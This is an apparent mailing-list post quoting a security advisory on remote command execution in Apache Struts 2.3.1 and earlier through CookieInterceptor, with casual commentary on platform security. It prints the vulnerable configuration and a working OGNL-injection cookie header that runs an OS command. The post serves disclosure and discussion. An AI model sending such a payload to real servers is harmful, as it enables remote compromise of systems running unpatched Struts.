Just how bad is that Sec-Consult Apache Struts vulnerability... (from their advisory) ___
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) Given struts.xml is configured to handle all cookie names (independent of limited cookie values): <action name="Test" class="example.Test"> <interceptor-ref name="cookie"> <param name="cookiesName">*</param> <param name="cookiesValue">1,2</param> </interceptor-ref> <result ...> </action> The following HTTP header will execute an OS command when sent to Test.action: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1 ___ I assume Struts is extremely widely used and everyone is already owned? Who was it who thought that OGNL was a good idea? Between this and .Net being completely broken, the only platforms left are Ruby on Rails and Python's Django! Oh, and PHP! :> -dave -- INFILTRATE 2012 January 12th-13th in Miami - the world's best offensive information security conference. www.infiltratecon.com
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Dailydave mailing list Dailydave@lists.immunityinc.com http://lists.immunityinc.com/mailman/listinfo/dailydave